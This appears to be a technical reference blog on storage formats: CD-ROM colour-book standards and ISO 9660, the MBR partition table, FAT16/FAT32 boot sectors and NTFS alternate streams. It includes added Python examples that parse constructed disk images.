However, until last year making a CD-ROM was problematic, because mastering one required special equipment. These so-called CD writers have now become affordable, so making a CD-ROM master (which can also be read in normal CD drives) is no big deal anymore. Making duplicates (the silver CD-ROMs) from a master (the golden CD-ROM) costs about 60 BEF a piece, which is a fair price!
The only problem was that CD-ROMs were not interchangeable between different computer architectures. The ISO 9660 standard was created to define the external characteristics of data on a CD-ROM so as to make it architecture independent. The first standard did not quite go far enough, so an ad hoc committee of hardware and software suppliers met at the High Sierra Hotel in Nevada (USA) and drew up a proposal for the "High Sierra" format for the CD-ROM file structure. The previous ISO 9660 standard and the High Sierra file structure were combined into a complete ISO 9660 standard (1988).
Almost 6 million CD readers have been sold so far, which proves that CD-ROMs are a very popular medium among commercial and non-commercial end users.

Colour books of standards

The Compact Disc Digital Audio (CD-DA) standard (or just CD) made by Philips and Sony in the early 1980s became the de facto standard for all audio discs, and means that any CD plays on any audio CD drive. This standard became known as the Red Book. The Red Book specifies that the audio data is on the CD in one or more tracks. Each track is normally one song. These tracks are further subdivided into sectors that are 1/75 of a second in length and contain 2352 bytes of audio data in digital form. A maximum of 99 audio tracks may be placed on a standard Red Book disc.
In addition to the 2352 bytes of audio data, the Red Book specifies the addition of 2 layers of error detection and error correction code (EDC/ECC). The compact disc utilises the Cross Interleave Reed-Solomon Code (CIRC) in its first two layers of error protection. If a disc gets scratched or dirty and a laser cannot read the data, the CD player uses the CIRC to recreate the music.
Each sector is also assigned 98 control bytes, which control the timing information that the CD player uses to display the length of each song.
The Yellow Book standard was introduced by Philips and Sony in 1984 which defined the Compact Disc Read Only Memory (CD-ROM) layout.
The Yellow Book extended the Red Book by adding two new types of track.
The track type defined in the Red Book is:
· CD-Audio, for audio music.
The two new track types defined in the Yellow Book are:
· CD-ROM Mode 1, usually used for computer data.
· CD-ROM Mode 2, usually used for compressed audio data, and video/picture data. Also, usually further defined as XA (eXtended Architecture).
The CD-ROM Mode 1 and Mode 2 tracks use the Red Book specifications as a foundation. The difference between the Red Book and the Yellow Book is a redefinition of the 2352 byte Red Book data area.
Furthermore, the Yellow Book CD-ROM Mode 1 and Mode 2 use the same track layout as the Red Book specification, including the error correction and control bytes. The fundamental difference between the two Yellow Book CD-ROM modes is the way in which they use the main data segment.
Yellow Book CD-ROM Mode 1 is used for both ISO 9660 and non-ISO 9660 discs. ISO 9660-compliant CD-ROMs are readable by any kind of (modern) operating system, such as DOS, UNIX, MacOS, AmigaDOS and others.
The CD-ROM Mode 1 divides the 2352 byte data area defined by the Red Book standards into the following:
· 12 bytes of synchronisation
· 4 bytes of header information
· 2048 bytes of user information
· 288 bytes of error correction and detection codes.
The first 16 bytes contain the synchronisation and header information that the computer uses to determine which sector it is reading. The following 2048 bytes contain the actual user data. Together with the 288 bytes of error correction that follow, these make up the full 2352-byte sector of the Red Book standard.
The last 288 bytes carry an additional layer of error detection and correction code. This additional layer, which is found only in Mode 1, provides the reliability that is needed for computer data, where a single wrong byte cannot be tolerated the way it can in audio.
CD-ROM Mode 2 redefines the use of the 2352 byte data area as follows:
· 12 bytes of synchronisation
· 4 bytes of header information
· 2336 bytes of user data.
The main advantage of Mode 2 is that it provides an additional 14 per cent of the user data space per sector (2336 versus 2048 bytes). The reason is that Mode 2 does not have the additional EDC and ECC error correction data of Mode 1.
Mode 2 discs are normally used in extended architecture (XA) format. Even without XA, there are still two layers of error correction as defined in the Red Book standard. CD-ROM Mode 2 discs can be read by a standard CD-ROM drive, but require special software to decode and strip the user data from each sector.
CD-ROM Mode 2 allows compressed audio data and video/picture data to be incorporated on the disc, thanks to the alignment of the byte layout. The drawback is that a CD-ROM drive reading this data cannot read computer data while it's playing audio.
The next step in CD technology was to create a file format that lent itself to the incorporation of audio and video/picture data. To define this extension to the Yellow Book standard, Sony and Philips produced the Compact Disc Read Only Memory Extended Architecture (CD-ROM/XA). An XA disc has compressed audio and computer data interleaved on the same track, so the drive can read the computer data and play the audio at the same time.
This was a dramatic improvement on existing Yellow Book technology, and marks the point from which application discs that made best use of CD-ROM technology started to develop. CD-ROM/XA Mode 2 is subdivided into Form 1 (for computer data) and Form 2 (for compressed audio data and video/picture data).
The Compact Disc Interactive (CD-I) Media standard was released in 1987 by Philips. This standard specifies the CD-I disc layout and an operating system called CD-RTOS. This specification is known as the Green Book standard. Like CD-ROM/XA, this standard allows for the interleaving of computer data and compressed audio on the same track. The CD-I track is not shown in the table of contents on the disc. This prevents audio players from playing the CD-I track. The sector layout of a CD-I disc is identical to CD-ROM/XA. A CD-I system consists of a stand-alone CD-I player connected to a TV set.
Remember, the main drawback of a CD-ROM is, at least for some people, that it is a read-only medium (the ROM part of its name)! Writable media were needed to fulfil new (created) needs. In Frankfurt (Germany) a group was formed (guess the name), the Frankfurt Group, which includes Philips, Sony, Kodak and others, to take CD-ROM into the writable market. This became the Orange Book standard, defining a CD that lets users write audio and/or data to disc. Part 1 of the Orange Book describes a Compact Disc-Magneto Optical (CD-MO) on which data can be written, erased and rewritten. Part 2 describes a Compact Disc Write Once (CD-WO) on which data can be written but not erased. The CD-WO is better known under its name CD-R, where R stands for recordable. CD writers are becoming quite popular these days (and affordable).

The ISO 9660 File System
An ISO 9660 CD-ROM is described in Figure 1.


A reserved area at the beginning of the disc, the system area, is present for use in booting from the CD-ROM. Its use is not specified by the ISO 9660 standard, but generally it is used for boot information. It occupies the first 16 logical sectors (32 KiB with 2048-byte sectors).
Immediately afterwards, starting at logical sector 16, a series of volume descriptors details the contents and kind of information contained on the disc (something like the partition table of MS-DOS).
A volume descriptor describes the characteristics of the file system information present on a given CD-ROM, or volume. It is divided into two parts;
· the type of volume descriptor, and
· the characteristics of the descriptor.
The volume descriptor is constructed in this manner so that if a program reading the disc does not understand a particular descriptor, it can simply skip it until it finds one it recognises, allowing many different types of information on one CD-ROM. Also, if an error were to render a descriptor unreadable, a subsequent redundant copy could allow for fault recovery. When checking CD-ROMs with a dump utility we find each descriptor occupying one logical sector of its own, with a backup copy of the descriptor a few logical sectors further on.
The minimum requirement is a primary volume descriptor describing the ISO 9660 file system followed by a volume descriptor set terminator (descriptor type 255), which marks the end of the list. A reader should verify the standard identifier "CD001" in each descriptor and stop at the terminator rather than trusting any count.
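The descriptor walk just described and the sector layout from the colour-book section, as an added example that is not part of the original article: a Python reader that starts at logical sector 16, verifies "CD001" in each descriptor, decodes the primary descriptor's identifiers and sizes (insisting that the both-endian fields agree, which is a cheap corruption check), and stops at the type 255 terminator; plus functions that build and split a raw 2352-byte Mode 1 sector into its 12 sync, 4 header, 2048 user and 288 EDC/ECC bytes. The disc image is constructed in the block; the EDC/ECC bytes are left zero because the example is about layout, not the Reed-Solomon code.

```python
import struct

SECTOR = 2048                       # logical sector = Mode 1 user-data area
SYSTEM_AREA_SECTORS = 16            # 32 KiB reserved before the first descriptor
DESCRIPTOR_TYPES = {0: "boot record", 1: "primary", 2: "supplementary",
                    3: "partition", 255: "terminator"}
SYNC = b"\x00" + b"\xff" * 10 + b"\x00"   # the 12 synchronisation bytes

def both_endian32(n: int) -> bytes:
    """ISO 9660 stores many integers twice: little-endian, then big-endian."""
    return struct.pack("<I", n) + struct.pack(">I", n)

def both_endian16(n: int) -> bytes:
    return struct.pack("<H", n) + struct.pack(">H", n)

def read_both32(b: bytes) -> int:
    """Read a both-endian field and insist the halves agree; a mismatch means a
    corrupt or deliberately crafted image."""
    le, be = struct.unpack("<I", b[:4])[0], struct.unpack(">I", b[4:8])[0]
    if le != be:
        raise ValueError(f"both-endian field disagrees: {le} != {be}")
    return le

def build_primary_descriptor(volume_id: str, space_size: int, system_id: str = "LINUX") -> bytes:
    d = bytearray(SECTOR)
    d[0] = 1                                   # type: primary volume descriptor
    d[1:6] = b"CD001"                          # standard identifier
    d[6] = 1                                   # version
    d[8:40] = system_id.encode("ascii").ljust(32)
    d[40:72] = volume_id.encode("ascii").ljust(32)
    d[80:88] = both_endian32(space_size)       # volume space size, in logical blocks
    d[120:124] = both_endian16(1)              # volume set size
    d[124:128] = both_endian16(1)              # volume sequence number
    d[128:132] = both_endian16(SECTOR)         # logical block size
    return bytes(d)

def build_terminator() -> bytes:
    d = bytearray(SECTOR)
    d[0], d[1:6], d[6] = 255, b"CD001", 1
    return bytes(d)

def build_image(volume_id: str = "DEMO_DISC") -> bytes:
    """Constructed image: empty system area, one primary descriptor, terminator."""
    return (b"\x00" * (SYSTEM_AREA_SECTORS * SECTOR)
            + build_primary_descriptor(volume_id, 18) + build_terminator())

def parse_descriptors(image: bytes):
    """Walk the volume descriptor set from sector 16 until the terminator,
    recording (and otherwise skipping) descriptor types we do not decode."""
    out, lba = [], SYSTEM_AREA_SECTORS
    while True:
        d = image[lba * SECTOR:(lba + 1) * SECTOR]
        if len(d) < SECTOR or d[1:6] != b"CD001":
            raise ValueError(f"no volume descriptor at logical sector {lba}")
        entry = {"lba": lba, "version": d[6],
                 "type": DESCRIPTOR_TYPES.get(d[0], f"unknown({d[0]})")}
        if d[0] in (1, 2):                     # primary and supplementary share this layout
            entry.update(system_id=d[8:40].decode("ascii").rstrip(),
                         volume_id=d[40:72].decode("ascii").rstrip(),
                         volume_space_size=read_both32(d[80:88]),
                         logical_block_size=struct.unpack("<H", d[128:130])[0])
        out.append(entry)
        if d[0] == 255:
            return out
        lba += 1

def build_mode1_sector(user: bytes, msf_bcd=(0x00, 0x02, 0x16)) -> bytes:
    """Raw 2352-byte Yellow Book Mode 1 sector.  The header holds the BCD-coded
    minute/second/frame address and the mode byte; EDC/ECC is left zero here."""
    if len(user) != 2048:
        raise ValueError("Mode 1 carries exactly 2048 user bytes")
    return SYNC + bytes(msf_bcd) + b"\x01" + user + b"\x00" * 288

def split_raw_sector(raw: bytes) -> dict:
    """Undo the layout from the article: 12 sync, 4 header, then user data
    (2048 in Mode 1, 2336 in Mode 2) and, in Mode 1 only, 288 EDC/ECC bytes."""
    if len(raw) != 2352 or raw[:12] != SYNC:
        raise ValueError("not a raw 2352-byte sector")
    msf, mode = tuple(raw[12:15]), raw[15]
    if mode == 1:
        return {"mode": 1, "msf": msf, "user": raw[16:2064], "edc_ecc": raw[2064:2352]}
    if mode == 2:
        return {"mode": 2, "msf": msf, "user": raw[16:2352]}
    raise ValueError(f"unknown sector mode {mode}")

if __name__ == "__main__":
    for entry in parse_descriptors(build_image()):
        print(entry)
    print(split_raw_sector(build_mode1_sector(b"U" * 2048))["mode"])   # 1
```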

Thursday, 15 March 2012

Master Boot Record (MBR)

In the IBM PC architecture the Master Boot Record (MBR), or partition sector, is the 512-byte (half-kilobyte) boot sector, i.e. the very first sector of a hard disk, which contains the code and data needed for booting the operating system(s).

The bootstrapping firmware contained within the ROM BIOS loads and executes the master boot record. The MBR of a drive usually includes the drive's partition table, which the PC uses to load and run the boot record of the partition that is marked with the active flag. This design allows the BIOS to load any OS without knowing exactly where to start inside its partition. Because the MBR is read almost immediately when the computer is started, many computer viruses made in the era before virus scanner software became widespread operated by changing the code within the MBR.

The Partition Table:

In computer engineering, hard disk drive partitioning is the creation of logical divisions on a hard disk that allows one to apply operating system-specific logical formatting.

The partition table is located in the master boot record, which is the first sector on the disk. The partition table is 64 bytes long and holds 4 entries of 16 bytes each.

The partition table starts at offset 0x1BE (hexadecimal), and each entry is 16 bytes long, so the sector lays out as follows:

Master Boot Record / Extended Partition Boot Record
(offset)
0x0000 to 0x01BD - First 446 bytes (boot loader code)
0x01BE to 0x01CD - Partition entry 1
0x01CE to 0x01DD - Partition entry 2
0x01DE to 0x01ED - Partition entry 3
0x01EE to 0x01FD - Partition entry 4
0x01FE to 0x01FF - Boot signature (55 AA)

Each partition table entry has the following arrangement:

|====================================================|
| Byte Count | Description of contents               |
|====================================================|
|      1     | Boot indicator (0x00 off, 0x80 on)    |
|====================================================|
|      3     | Starting head, cylinder and sector    |
|====================================================|
|      1     | File system descriptor                 |
|====================================================|
|      3     | Ending head, cylinder and sector      |
|====================================================|
|      4     | Starting sector (LBA from disk start) |
|====================================================|
|      4     | Number of sectors in partition        |
|====================================================|

Sample partition table entry (keep in mind that all multi-byte values are little-endian):

offset: value                  explanation
======: =====                  ===========
0x01BE: 0x80                   bootable flag (0x00 for flag off, 0x80 for on): this partition is active
0x01BF: 0x00 0x02 0x00         starting head 0, sector 2, cylinder 0 (the sector number is the low 6 bits of the middle byte; its top 2 bits are bits 8-9 of the cylinder)
0x01C2: 0x07                   file system descriptor (0x07 is NTFS/HPFS)
0x01C3: 0x1A 0x5B 0x8C         ending head 26 (0x1A), sector 27 (0x5B & 0x3F), cylinder 396 (((0x5B & 0xC0) << 2) | 0x8C)
0x01C6: 0x02 0x00 0x00 0x00    starting sector 0x00000002 = 2 (LBA, relative to start of disk)
0x01CA: 0x00 0x35 0x0C 0x00    number of sectors 0x000C3500 = 800,000 (about 390 MiB at 512 bytes each)
Active partition: the bootable flag marks the active partition. Normally only one partition is active at a time. The flag is used during boot: after the BIOS loads the MBR into memory and executes it, the MBR code scans the partition table at its end and locates the active partition, then loads that partition's boot sector into memory and runs it. Boot code that finds two active entries, or none, typically refuses to continue.

Logical partitions: logical partitions are a way around the Master Boot Record's limit of four partitions. One partition can be designated as an extended partition. It contains a chain of logical partitions, each described by its own partition table in an Extended Partition Boot Record (EPBR, usually just EBR) at the start of that logical partition; each EBR also holds a link to the next one. The traditional figure of up to 24 logical partitions comes from the DOS drive-letter limit (C: to Z:), not from the on-disk format, which imposes no fixed count. Modern operating systems treat logical partitions the same as primary ones.
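The table layout and the sample entry above turned into a parser, as an added example that is not part of the original post: it checks the 55 AA signature, decodes the four entries (including the packed CHS bytes and the two little-endian 32-bit fields), finds the active partition, and follows the EBR chain of an extended partition. The sample entry is the one from the page, byte for byte; the small disk image with two linked EBRs is constructed for the demo, as are the function and field names. The one non-obvious rule the walker encodes is that inside an EBR the first entry's start is relative to that EBR's own sector while the second entry's (the link's) is relative to the start of the extended partition.

```python
import struct
from dataclasses import dataclass

SECTOR = 512
TABLE_OFFSET = 0x1BE
EXTENDED_TYPES = {0x05, 0x0F, 0x85}     # DOS extended, Win95 LBA extended, Linux extended

@dataclass
class PartitionEntry:
    bootable: bool
    start_chs: tuple        # (head, sector, cylinder)
    type_id: int
    end_chs: tuple
    lba_start: int          # relative to the disk for MBR entries; see walk_logical for EBRs
    sectors: int

def decode_chs(b: bytes) -> tuple:
    """Three bytes: head; sector (low 6 bits) with the cylinder's top two bits
    (high 2 bits); cylinder's low 8 bits."""
    head, sec_cyl, cyl_lo = b
    return head, sec_cyl & 0x3F, ((sec_cyl & 0xC0) << 2) | cyl_lo

def parse_entry(raw16: bytes) -> PartitionEntry:
    flag, chs0, ptype, chs1, lba, n = struct.unpack("<B3sB3sII", raw16)
    if flag not in (0x00, 0x80):
        raise ValueError(f"invalid boot indicator {flag:#04x}")
    return PartitionEntry(flag == 0x80, decode_chs(chs0), ptype, decode_chs(chs1), lba, n)

def parse_table(sector: bytes):
    """The four 16-byte entries at 0x1BE, after checking the 55 AA signature."""
    if len(sector) != SECTOR or sector[510:512] != b"\x55\xAA":
        raise ValueError("missing 55 AA boot signature")
    return [parse_entry(sector[TABLE_OFFSET + 16 * i:TABLE_OFFSET + 16 * (i + 1)])
            for i in range(4)]

def walk_logical(disk: bytes, ext: PartitionEntry):
    """Follow the EBR chain inside an extended partition."""
    out, ebr_lba, seen = [], ext.lba_start, set()
    while ebr_lba not in seen:                 # a crafted circular chain would loop forever
        seen.add(ebr_lba)
        logical, link = parse_table(disk[ebr_lba * SECTOR:(ebr_lba + 1) * SECTOR])[:2]
        if logical.type_id:
            out.append((logical.type_id, ebr_lba + logical.lba_start, logical.sectors))
        if link.type_id not in EXTENDED_TYPES:
            break
        ebr_lba = ext.lba_start + link.lba_start
    return out

def analyse(disk: bytes) -> dict:
    mbr = parse_table(disk[:SECTOR])
    active = [i + 1 for i, e in enumerate(mbr) if e.bootable]
    if len(active) > 1:
        raise ValueError("more than one partition is flagged active")
    logical = []
    for e in mbr:
        if e.type_id in EXTENDED_TYPES:
            logical += walk_logical(disk, e)
    return {"primaries": [(e.type_id, e.lba_start, e.sectors) for e in mbr if e.type_id],
            "active": active[0] if active else None, "logical": logical}

# The entry from the article's sample table, as raw bytes.
PAGE_SAMPLE_ENTRY = bytes.fromhex("80 000200 07 1a5b8c 02000000 00350c00")

def make_entry(bootable: bool, ptype: int, lba: int, n: int) -> bytes:
    """CHS fields zeroed: modern boot code uses the LBA fields only."""
    return struct.pack("<B3sB3sII", 0x80 if bootable else 0, b"\0\0\0", ptype, b"\0\0\0", lba, n)

def build_sample_disk() -> bytes:
    """Constructed 4096-sector disk: one NTFS primary, one extended partition
    holding two logical partitions linked through two EBRs."""
    disk = bytearray(SECTOR * 4096)
    def put_table(lba: int, entries: bytes):
        off = lba * SECTOR + TABLE_OFFSET
        disk[off:off + len(entries)] = entries
        disk[lba * SECTOR + 510:lba * SECTOR + 512] = b"\x55\xAA"
    put_table(0, make_entry(True, 0x07, 63, 900) + make_entry(False, 0x05, 1000, 3000))
    put_table(1000, make_entry(False, 0x83, 63, 1000) + make_entry(False, 0x05, 1500, 1500))
    put_table(2500, make_entry(False, 0x83, 63, 1400))          # last EBR: no link
    return bytes(disk)

if __name__ == "__main__":
    print(parse_entry(PAGE_SAMPLE_ENTRY))
    print(analyse(build_sample_disk()))
```

The `seen` set in walk_logical is the kind of check a forensic or boot-time parser needs and a naive one omits: an EBR whose link points back to an earlier EBR is valid-looking bytes that would otherwise spin the loop forever.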

FAT 16

Introduction
This is the 16-bit version of the FAT file system. The 16-bit part refers to the width of the entries that track allocation units: FAT16 identifies each allocation unit (called a cluster) with a 16-bit number, which gives 65,536 possible cluster numbers. A few of these values are reserved, so a FAT16 volume holds at most 65,524 data clusters; a volume with fewer than 4,085 clusters is FAT12 and one with 65,525 or more must be FAT32. The size of each cluster is defined in the boot sector of the volume (volume = partition). The file system descriptor (partition type) usually associated with FAT16 volumes is 04h or 06h: 04h is used on volumes with fewer than 65,536 sectors (typically drives smaller than 32 MB), and 06h on volumes with 65,536 sectors or more. A third variant, descriptor 0Eh, is used when the partition is addressed in LBA mode.

Basic Structure
A FAT16 volume consists of the following regions, in this order:
FAT16 File System Structure

Region
Reserved Region (including the Boot Sector)
File Allocation Table (FAT), usually two copies
Root Directory
Data Region

The first sector (the boot sector) contains the information needed to calculate the sizes and locations of the other regions. The boot sector also contains code to boot the operating system installed on the volume. The data region is split into logical blocks called clusters. Each cluster has an accompanying entry in the FAT region: the entry either holds the number of the next cluster that contains data from the same file, or a so-called end-of-file value meaning that no more clusters belong to the file. A damaged or deliberately corrupted chain (an entry that loops back, or one that points outside the data region) is therefore something every tool that follows the chain has to check for. The root directory and its sub-directories hold the file name, dates, attribute flags and starting cluster of each file system object.

Boot Sector
The first sector in the reserved region is the boot sector. Although this sector is typically 512 bytes, it can be larger depending on the media. The boot sector starts with a 3-byte jump instruction to the bootstrap code, followed by an 8-byte string set by the operating system that formatted the volume. This is followed by the BIOS Parameter Block and then by an Extended BIOS Parameter Block. Finally the boot sector contains the boot code and a signature.

Structure of the FAT16 boot sector (BPB = BIOS Parameter Block, Ext. BPB = Extended BIOS Parameter Block)

Part      Offset  Size       Description
====      ======  ====       ===========
Code      0000h   3 bytes    Jump to the bootstrap code (EBh xxh 90h or E9h xxxxh)
OS Name   0003h   8 bytes    OEM ID - name of the formatting OS
BPB       000Bh   2 bytes    Bytes per sector - usually 512
          000Dh   1 byte     Sectors per cluster - a power of two from 1 to 128
          000Eh   2 bytes    Reserved sectors from the start of the volume, including the boot sector itself
          0010h   1 byte     Number of FAT copies - usually 2, so that a damaged FAT can be recovered from the other
          0011h   2 bytes    Number of root directory entries - 512 is the recommended value
          0013h   2 bytes    Small number of sectors - used when the volume has fewer than 65,536 sectors (less than 32 MB), otherwise 0
          0015h   1 byte     Media descriptor - F8h for hard disks, F0h for 1.44 MB floppies
          0016h   2 bytes    Sectors per FAT
          0018h   2 bytes    Sectors per track - the disk geometry used when formatting
          001Ah   2 bytes    Heads - the disk geometry used when formatting
          001Ch   4 bytes    Hidden sectors - sectors on the disk before the start of this volume
          0020h   4 bytes    Large number of sectors - used when the volume has 65,536 sectors or more (32 MB or larger), otherwise 0
Ext. BPB  0024h   1 byte     Drive number - used by some bootstrap code, e.g. MS-DOS (00h for floppies, 80h for hard disks)
          0025h   1 byte     Reserved - used by Windows NT to decide whether it should check disk integrity
          0026h   1 byte     Extended boot signature - 29h indicates that the next three fields are present
          0027h   4 bytes    Volume serial number
          002Bh   11 bytes   Volume label - should be the same as the volume label entry in the root directory
          0036h   8 bytes    File system type - the string 'FAT16   ' (informational only; the real type follows from the cluster count)
Code      003Eh   448 bytes  Bootstrap code - may shrink in the future
Sig.      01FEh   2 bytes    Boot sector signature - the bytes 55h AAh (AA55h when read as a little-endian word)



FAT 32

Introduction
This is the 32-bit version of the FAT file system. The 32-bit part refers to the width of the entries that track allocation units: FAT32 identifies each allocation unit (called a cluster) with a 32-bit entry. Only the low 28 bits of an entry hold the cluster number (the top 4 bits are reserved), so the addressable range is 2^28 = 268,435,456 clusters rather than the 4,294,967,296 a full 32-bit number would allow. The size of each cluster is defined in the boot sector of the volume (volume = partition).

Boot Sector Structure
The first sector on the volume is the boot sector. It occupies one sector (normally 512 bytes) and has the structure below. Unlike FAT16, FAT32 keeps more than the boot sector in the reserved region: a File System Information (FSInfo) sector and a backup copy of the boot sector, whose positions are recorded at offsets 0030h and 0032h of the boot sector.

Structure of the FAT32 boot sector (BPB = BIOS Parameter Block, Ext. BPB = Extended BIOS Parameter Block)

Part      Offset  Size       Description
====      ======  ====       ===========
Code      0000h   3 bytes    Jump to the bootstrap code (EBh xxh 90h or E9h xxxxh)
OS Name   0003h   8 bytes    OEM ID - name of the formatting OS
BPB       000Bh   2 bytes    Bytes per sector on the physical medium - normally 512
          000Dh   1 byte     Sectors per cluster - 1, 2, 4, 8, 16, 32, 64 or 128 sectors
          000Eh   2 bytes    Reserved sectors in front of the FAT(s), including the boot sector - normally 32 on FAT32
          0010h   1 byte     Number of FAT copies - normally 2
          0011h   2 bytes    Root directory entries - must be 0 on FAT32 (the root directory is an ordinary cluster chain)
          0013h   2 bytes    Small number of sectors - must be 0 on FAT32
          0015h   1 byte     Media descriptor - the same meaning as in FAT16; F8h for hard disks and flash media
          0016h   2 bytes    Sectors per FAT (16-bit) - must be 0 on FAT32; the 32-bit field at 0024h is used instead
          0018h   2 bytes    Sectors per track - the disk geometry used when formatting the partition
          001Ah   2 bytes    Heads - the disk geometry used when formatting the partition
          001Ch   4 bytes    Hidden sectors - the number of sectors on the disk before the start of this partition
          0020h   4 bytes    Number of sectors in the partition
          0024h   4 bytes    Sectors per FAT (32-bit)
          0028h   2 bytes    Flags - bit 7 set means only one FAT is active (its number is in bits 0-3); clear means all FATs are mirrored
          002Ah   2 bytes    FAT32 version (high byte = major version, low byte = minor version) - 0.0 is the only defined version
          002Ch   4 bytes    Cluster number of the start of the root directory - normally 2
          0030h   2 bytes    Sector number, from the start of the partition, of the File System Information (FSInfo) sector - normally 1
          0032h   2 bytes    Sector number, from the start of the partition, of the backup boot sector - normally 6
          0034h   12 bytes   Reserved
Ext. BPB  0040h   1 byte     Logical drive number - normally 00h for floppies and 80h for hard drives
          0041h   1 byte     Reserved - used by Windows NT in the same way as offset 0025h of a FAT16 boot sector
          0042h   1 byte     Extended boot signature - 29h indicates that the next three fields are present
          0043h   4 bytes    ID - randomly generated volume serial number
          0047h   11 bytes   Volume label - the same as stored in the volume label entry of the root directory
          0052h   8 bytes    System ID - the string 'FAT32   ' (informational only; the real type follows from the cluster count)
Code      005Ah   420 bytes  Bootstrap code - may shrink in the future
Sig.      01FEh   2 bytes    Boot sector signature - the bytes 55h AAh (AA55h when read as a little-endian word)
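The following Python script is an added example, not code from the original page, that parses both the FAT16 and the FAT32 boot-sector layouts tabulated above and derives where the FATs, the root directory and the data region begin. The two boot sectors it reads are constructed inside the script from the offsets in the tables, with made-up geometry. The decision between FAT12, FAT16 and FAT32 is made from the cluster count, which is how the FAT specification defines the variant; the 'FAT16'/'FAT32' string in the extended BPB is reported but never relied on.

```python
"""FAT16/FAT32 boot-sector parser that derives the region layout (added example).

The boot sectors below are constructed from the field offsets in the tables;
the geometry values are invented, not taken from a real volume.
"""
import struct

BPB_FMT = "<HBHBHHBHHHII"   # common BPB, offsets 000Bh..0023h
VALID_BPS = (512, 1024, 2048, 4096)


def parse_boot_sector(boot):
    """Parse the BPB and the FAT16 or FAT32 extended BPB and compute where the FAT,
    root directory and data region start. The variant comes from the cluster count;
    the 'FAT16'/'FAT32' string at the end of the extended BPB is never trusted."""
    if len(boot) < 512 or boot[0x1FE:0x200] != b"\x55\xAA":
        raise ValueError("missing 55AAh boot sector signature")
    if boot[0] not in (0xEB, 0xE9):
        raise ValueError("boot sector does not start with a jump instruction")
    (bps, spc, reserved, nfats, root_entries, total16,
     media, fat16_size, spt, heads, hidden, total32) = struct.unpack_from(BPB_FMT, boot, 0x0B)
    if bps not in VALID_BPS or spc == 0 or spc > 128 or spc & (spc - 1):
        raise ValueError("bad bytes per sector or sectors per cluster")
    if reserved == 0 or nfats == 0:
        raise ValueError("reserved sector count and FAT count must be non-zero")
    total = total16 or total32
    if fat16_size:                                   # FAT12/FAT16 layout: ext. BPB at 0024h
        fat_size, root_cluster, ebpb = fat16_size, None, 0x24
    else:                                            # FAT32 layout: ext. BPB at 0040h
        fat_size = struct.unpack_from("<I", boot, 0x24)[0]
        root_cluster = struct.unpack_from("<I", boot, 0x2C)[0]
        ebpb = 0x40
    if total == 0 or fat_size == 0:
        raise ValueError("sector count and FAT size must be non-zero")
    root_dir_sectors = (root_entries * 32 + bps - 1) // bps      # 0 on FAT32
    fat_start = reserved
    root_start = fat_start + nfats * fat_size
    data_start = root_start + root_dir_sectors
    if data_start >= total:
        raise ValueError("FAT and root directory extend past the end of the volume")
    clusters = (total - data_start) // spc
    variant = "FAT12" if clusters < 4085 else "FAT16" if clusters < 65525 else "FAT32"
    if (variant == "FAT32") != (fat16_size == 0):
        raise ValueError(f"cluster count says {variant} but the BPB uses the other layout")
    ext_sig = boot[ebpb + 2]
    info = {"variant": variant, "bytes_per_sector": bps, "sectors_per_cluster": spc,
            "media": media, "fat_start": fat_start, "root_start": root_start,
            "data_start": data_start, "clusters": clusters, "root_cluster": root_cluster,
            "drive": boot[ebpb], "serial": None, "label": None, "fstype_string": None}
    if ext_sig in (0x28, 0x29):
        info["serial"] = struct.unpack_from("<I", boot, ebpb + 3)[0]
    if ext_sig == 0x29:
        info["label"] = boot[ebpb + 7:ebpb + 18].decode("ascii", "replace").rstrip()
        info["fstype_string"] = boot[ebpb + 18:ebpb + 26].decode("ascii", "replace").rstrip()
    return info


def cluster_to_sector(info, cluster):
    """First sector of a data cluster; cluster numbers 0 and 1 are reserved,
    so cluster 2 is the first cluster of the data region."""
    if cluster < 2 or cluster >= info["clusters"] + 2:
        raise ValueError(f"cluster {cluster} is outside the data region")
    return info["data_start"] + (cluster - 2) * info["sectors_per_cluster"]


# ---- constructed boot sectors (hypothetical geometry) ----
def build_boot_sector(*, bps, spc, reserved, nfats, root_entries, total, fat_size,
                      spt, heads, hidden, fat32=False, label=b"NO NAME", fstype=b"FAT16"):
    sec = bytearray(512)
    sec[0:3] = b"\xEB\x3C\x90"                    # JMP short + NOP
    sec[3:11] = b"MSWIN4.1"
    total16 = total if total < 0x10000 and not fat32 else 0
    struct.pack_into(BPB_FMT, sec, 0x0B, bps, spc, reserved, nfats, root_entries, total16,
                     0xF8, 0 if fat32 else fat_size, spt, heads, hidden, 0 if total16 else total)
    if fat32:   # sectors per FAT, flags, version, root cluster, FSInfo sector, backup boot sector
        struct.pack_into("<IHHIHH", sec, 0x24, fat_size, 0, 0, 2, 1, 6)
    ebpb = 0x40 if fat32 else 0x24
    sec[ebpb], sec[ebpb + 2] = 0x80, 0x29              # drive number, extended boot signature
    struct.pack_into("<I", sec, ebpb + 3, 0x1234ABCD)  # volume serial number
    sec[ebpb + 7:ebpb + 18] = label.ljust(11)
    sec[ebpb + 18:ebpb + 26] = fstype.ljust(8)
    sec[0x1FE:0x200] = b"\x55\xAA"
    return bytes(sec)


def sample_fat16():
    """32 MiB volume: 65,536 sectors, so the large sector count at 0020h is used."""
    return build_boot_sector(bps=512, spc=4, reserved=1, nfats=2, root_entries=512,
                             total=65536, fat_size=64, spt=63, heads=16, hidden=63,
                             label=b"DATA16", fstype=b"FAT16")


def sample_fat32(fstype=b"FAT32"):
    """512 MiB volume with the usual 32 reserved sectors and 1024-sector FATs."""
    return build_boot_sector(bps=512, spc=8, reserved=32, nfats=2, root_entries=0,
                             total=1048576, fat_size=1024, spt=63, heads=255, hidden=2048,
                             fat32=True, label=b"DATA32", fstype=fstype)


if __name__ == "__main__":
    for boot in (sample_fat16(), sample_fat32(), sample_fat32(fstype=b"FAT16")):
        i = parse_boot_sector(boot)
        print(f"{i['variant']:5} label={i['label']!r} string={i['fstype_string']!r} "
              f"FAT@{i['fat_start']} root@{i['root_start']} data@{i['data_start']} "
              f"clusters={i['clusters']}")
```

The third sample deliberately carries a FAT32 layout with the string 'FAT16' in the system ID field, and the parser still reports FAT32. A tool that picks the variant from that string instead of from the arithmetic can be steered to the wrong FAT entry width by a single edited byte in the boot sector.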



New Technology File System (NTFS)

NTFS also includes security features required for file servers and high-end personal computers in a corporate environment, and data access control and ownership privileges important for data integrity.


Multiple Data Streams

NTFS supports multiple data streams: the stream name identifies an additional data attribute on the file, and a handle can be opened to each data stream separately. Each stream is thus a distinct data attribute of the same file. Streams have separate opportunistic locks, byte-range locks and sizes, but share the file's permissions.

This feature enables you to manage related data as a single unit. The following is an example of an alternate stream:

myfile.dat:stream2

A library of files might exist where the files are defined as alternate streams, as in the following example:

library:file1

:file2

